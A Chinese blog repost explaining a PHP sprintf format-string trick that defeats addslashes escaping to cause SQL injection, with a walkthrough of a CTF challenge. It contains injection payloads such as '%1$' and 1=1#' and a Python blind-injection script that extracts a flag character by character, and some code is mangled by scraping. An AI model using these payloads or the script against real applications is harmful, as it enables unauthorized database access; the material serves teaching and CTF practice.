php sprintf 千分位,PHP sprintf格式化字符串漏洞

最新推荐文章于 2021-03-18 17:08:22 发布
最新推荐文章于 2021-03-18 17:08:22 发布
阅读量248 收藏
点赞数
文章标签: php sprintf 千分位

原标题:PHP sprintf格式化字符串漏洞

原理

sprintf 把百分号(%)符号替换成一个作为参数进行传递的变量:

$number = 2;

$str = "Shanghai";

$txt = sprintf( "There are %u million cars in %s.",$number,$str);

echo$txt;

?>

运行结果

Thereare 2million cars in Shanghai.

定义和用法 sprintf 函数把格式化的字符串写入变量中。

arg1、arg2、++ 参数将被插入到主字符串中的百分号(%)符号处。该函数是逐步执行的。在第一个 % 符号处,插入 arg1,在第二个 % 符号处,插入 arg2,依此类推。

注释:如果 % 符号多于 arg 参数,则您必须使用占位符。占位符位于 % 符号之后,由数字和 "$" 组成。

$number = 123;

$txt = sprintf( "带有两位小数:%1$.2f


不带小数:%1$u" ,$number);

echo$txt;

?>

结果:

带有两位小数:123 .00

不带小数:123

漏洞分析

接下来看看sprintf的底层实现方法

switch(format[inpos]) {

case's':

{

zend_string * t;

zend_string * str = zval_get_tmp_string(tmp, &t);

php_sprintf_appendstring( & result, &outpos, ZSTR_VAL(str), width, precision, padding, alignment, ZSTR_LEN(str), 0, expprec, 0);

zend_tmp_string_release(t);

break;

}

case'd':

php_sprintf_appendint( & result, &outpos, zval_get_long(tmp), width, padding, alignment, always_sign);

break;

case'u':

php_sprintf_appenduint( & result, &outpos, zval_get_long(tmp), width, padding, alignment);

break;

case'g':

case'G':

case'e':

case'E':

case'f':

case'F':

php_sprintf_appenddouble( & result, &outpos, zval_get_double(tmp), width, padding, alignment, precision, adjusting, format[inpos], always_sign);

break;

case'c':

php_sprintf_appendchar( & result, &outpos, ( char) zval_get_long(tmp));

break;

case'o':

php_sprintf_append2n( & result, &outpos, zval_get_long(tmp), width, padding, alignment, 3, hexchars, expprec);

break;

case'x':

php_sprintf_append2n( & result, &outpos, zval_get_long(tmp), width, padding, alignment, 4, hexchars, expprec);

break;

case'X':

php_sprintf_append2n( & result, &outpos, zval_get_long(tmp), width, padding, alignment, 4, HEXCHARS, expprec);

break;

case'b':

php_sprintf_append2n( & result, &outpos, zval_get_long(tmp), width, padding, alignment, 1, hexchars, expprec);

break;

case'%':

php_sprintf_appendchar( & result, &outpos, '%');

break;

default:

break;

}

可以看到, php源码中只对15种类型做了匹配, 其他字符类型都直接break了,php未做任何处理,直接跳过,所以导致了这个问题:如果我们输入 "%" 或者 "%1$" ,他会把反斜杠当做格式化字符的类型,然而找不到匹配的项那么 "%" , "%1$" 就因为没有经过任何处理而被替换为空。

029767c539cdab955b8e5d10c9455390.png

因此sprintf注入的原理就是

我们用一个15种类型之外的 "" 来代替格式字符类型让函数替换为空,则“%1$'”后面的单引号就能闭合前面的单引号,以下是一些例子帮助我们更好的理解

不带占位符的

$sql= "select * from user where username='%' and 1=1 #';";

$user= 'admin';

echosprintf($sql,$user);

?>

运行结果:

select* fromuserwhereusername= ''and1= 1# ';

注意:username=''这里是两个单引号不是双引号

带有占位符:先看不带的原样输出

4aa3ce239eac04197009ebe8a196086b.png

and1= 1#

ANDb= 'and 1=1#'

SELECT * FROM t WHERE a= 'admin'ANDb= 'and 1=1#'

进行绕过

//addslashes函数:在预定义前面加反斜杠,预定义符有单引号( '),双引号("),反斜杠,NULL

$input = addslashes ("%1$' and1= 1#" );

$b = sprintf( "AND b='%s'", $input );

$sql = sprintf( "SELECT * FROM t WHERE a='%s' $b ", 'admin');

echo $sql ;

?>

对$input与$b进行了拼接

$sql = sprintf( "SELECT * FROM t WHERE a='%s' AND b='%1$' and 1=1#' ", 'admin');

很明显,这个句子里面的 是由addsashes为了转义单引号而加上的,使用%s与 %1$ 类匹配admin,那么admin只会出现在%s里, %1$ 为空 所以输出

%1$ ' and 1=1#

AND b=' %1$ ' and 1=1#'

SELECT * FROM t WHERE a= 'admin'AND b= ''and1= 1#'

d75dc74e521c7d6b80f1855ff08e4af5.png

对于这个问题,我们还可以这样写

$sql = sprintf( "SELECT * FROM table WHERE a='%1$' AND b='%d' and 1=1#' ", 'admin');

result:

SELECT* FROMt WHEREa= 'admin'ANDb= ''and1= 1# '

第一个格式化处匹配时为空,会让给后面的格式化匹配

以上两个例子是吃掉''来使得单引号逃逸出来

下面这个例子我们构造单引号

$input1 = '%1$c) OR 1 = 1 /*';

$input2 = 39 ;

$sql = "SELECT * FROM foo WHERE bar IN (' $input1') AND baz = %s";

echo($sql. "
");

$sql = sprintf ( $sql, $input2);

echo $sql ;

结果:

SELECT* FROMfoo WHEREbar IN( ' %1$c) OR 1 = 1 /* ') ANDbaz = %s

SELECT* FROMfoo WHEREbar IN( ' ') OR1= 1/* ') AND baz = 39

%c起到了类似chr的效果,将数字39转化为‘,从而导致了sql注入。

所以结果为:

SELECT* FROMfoo WHEREbar IN( '') OR1= 1/*) AND baz = 39实战

i春秋的 “迎圣诞,拿大奖”活动赛题 [url]https://www.ichunqiu.com/battalion?t=1&r=60469[/url]

进行fuzz时 ,当输入 % 时爆sprintf错误

26b5c7b1d78547bb15b7b2390a7e398b.png

于是构造 username=admin%1$' and 1=2# 与 username=admin%1$' and 1=1# 于是写下脚本:

# _*_ coding : utf-8 _*_

importrequests

importre

importurllib2

headers = {

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',

}

dbname = ""

chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

url = "http://00eec0b6e68b4332b078c559e3fee6307720121e6aaf49e4.changame.ichunqiu.com/"

form inrange( 30, 50):

fori inrange( 32, 126):

s = "%1$' or ascii(substr((select flag from flag),"+str(m)+ ",1))="+str(i)+ "#"

# str1 = urllib2.quote(s)

str1 = s

data={ 'username': str1, 'password': '12313'}

# print str1

# print urllib2.unquote(str1)

req = requests.post(url=url, data=data,headers=headers)

# print req.text

# print req.text

result = re.findall( 'password error', req.content)

ifresult:

dbname = dbname + chr(i)

printdbname

printchr(i) 返回搜狐,查看更多

责任编辑:

海纳易拓
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sprintf() 格式化数字,小数数,四舍五入
opfan的博客
12-15 2万+
<?php //生成4数,不足前面补0 $var=sprintf("%04d", 2); echo $var;//结果为0002 echo date('Y_m_d', time()).'_'.sprintf('d', rand(0,99)); ?>             sprintf()函数
深入理解php printf() 输出格式化字符串
12-18
此外,`printf()` 函数还有一系列相关的函数,如 `sprintf()` 可以将格式化字符串保存到变量中而不是直接输出,`vprintf()` 和 `vsprintf()` 可用于接收变量数组作为参数,而 `fprintf()` 则可以将格式化字符串...
php的%s,PHP sprintf() 函数
weixin_29699041的博客
03-10 240
更多实例例子 1使用格式值 %f:例子 2使用占符:
php float sprintf,关于phpsprintf函数的用法 控制浮点数格式
weixin_31972679的博客
03-18 114
关于phpsprintf函数的用法 控制浮点数格式控制浮点数打印格式浮点数的打印和格式控制是sprintf 的一大常用功能,浮点数使用格式符”%f”控制,默认保留小数点后6 数字,比如:复制代码 代码如下:sprintf("%f", 3.1415926); //结果:"3.141593"但,有时我们希望自己控制打印的宽度和小数数,这时就应该使用:”%m.nf”格式,其中m 表示打印数字的整体...
数值和千分的转换
qq_42108501的博客
09-26 716
/* 功能:将数值格式化千分输出 输入:number 要转换的数值 splitLen 小数点前分割的长度 pointLen 小数点后保留多少 输出:dstr: 转换后的字符串 返回值:void* */ void* formatNumber(double number,int splitLen,int pointLen,char *dstr) { char srcbuf[64]=""; char tmpbuf[64]=""; int i = 0; i
金额字段加千分隔符
编程开发资料库
10-09 258
/*======================================================================== =给金额字段加千分隔符 = ========================================================================*/ char * PAddFloatComma(double dIn...
PHP vsprintf()函数格式化字符串操作原理解析
01-19
格式化字符串写入变量中: <?php $number = 9; $str = Beijing; $txt = vsprintf(There are %u million bicycles in %s.,array($number,$str)); echo $txt; ?> 定义和用法 vsprintf() 函数把格式化字符串...
phpsprintf函数的用法 控制浮点数格式
01-20
控制浮点数打印格式浮点数的打印和格式控制是sprintf 的一大常用功能,浮点数使用格式符”%f”控制,默认保留小数点后6 数字,比如:复制代码 代码如下:sprintf(“%f”, 3.1415926); //结果:”3.141593″ 但,...
phpsprintf与printf函数用法区别解析
10-26
PHP编程语言中,`sprintf`和`printf`都是用于字符串格式化的函数,它们能够将变量按照特定的格式插入到字符串中。理解这两个函数的区别对于编写清晰、可读性强的PHP代码至关重要。 首先,`sprintf`函数的工作原理...
去除 boost::format lexical_cast 输出的整数中的千分
Kelvin ZENG
09-05 2024
用 boost::format 和 boost::lexical_cast 使得数据和字符串的互转方便又安全。 但是最近遇到将整数转换为字符串时,结果总是有逗号作为千分符。 千分符实际上是受 locale 控制的,去掉去掉千分符的方法就是修改 全局的 locale。在网上搜到一篇帖子,解决了我的问题。记之以备忘。 http://blog.csdn.net/koudaidai/arti
ThousandSep:将数字转换为带有千分隔符的字符串-matlab开发
05-30
千月 - 数字作为字符串,每 3 有一个分隔符S =千Sep(N,FSpec,Sep) 输入: N:数字,SPRINTF 接受的所有类,标量或数组。 FSpec:SPRINTF 的格式说明符。 可选,默认值:'%.16g' Sep:字符作为分隔符。 可选,默认: , 输出: S:如果 N 是标量,则为字符串,否则为单元格字符串。 例子: 千九(1234567.2345)%'1,234,567.2345' 千月(1234,字符(39))%'1'234' 千九 ([2.3, 1234], ',') % {'2.3', '1,234'} ThousandSep(-1234,'%9.1f',',')%'-1,234.0' 笔记: * 替代 java 调用,大约慢 20% (Matlab R2011b/64/Win7): nf = java.text.DecimalFormat; S = nf.f
千分格式化数字
weixin_34275734的博客
06-12 333
import java.text.*; //格式化数字 public class number { public static void main(String args[]) { double d = 123456.78; De...
php数字千分格式化输出
摘星辰Li
07-24 1642
php中有个函数可以千分的时候默认逗号分隔显示,方便阅读 number_format ( float $number , int $decimals = 0 , string $dec_point = "." , string $thousands_sep = "," ) : string //直接模板输出例子 {$row.dau|number_format} //输出结果: 23,241,23...
PHP中数字千分逗号分隔函数number_format()
热门推荐
zhang197093的博客
10-08 1万+
number_format 摘自PHP官方文档 (PHP 4, PHP 5) number_format — 以千分隔符方式格式化一个数字 说明 string number_format ( float $number [, int $decimals = 0 ] ) string number_format ( float $number , int
php处理金额整数转浮点带千分的小数
阳水平的博客
08-17 2594
金额相关的,最方便快捷的php函数:number_format (PHP 4, PHP 5, PHP 7)number_format — 以千分隔符方式格式化一个数字说明 string number_format ( float $number [, int $decimals = 0 ] )string number_format ( float $number , int $decimals
PHP中数字转为百分千分,万分。。。
weixin_34289454的博客
02-06 942
今天做项目中,需要将文章点击量显示在页面中,需求中给的是多少多少万,虽然不是什么难事,但做程序员这么久了,需要考虑的不再是简单的实现,而且有效率和快捷, 虽然PHP自带的函数有number_format()可以做到实现千分,但我要的是万分, 通过查找,发现了可以用以下这个方法: $num = 86231; # 将数字转为万分 echo $num>10000?sprintf...
sprintf函数可以用于格式化字符串详细代码
最新发布
05-26
下面是一个使用`sprintf`函数格式化字符串的示例代码: ```c #include int main() { char str[100]; int num = 42; float fnum = 3.14; sprintf(str, "The number is %d and the float is %.2f", num, fnum)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值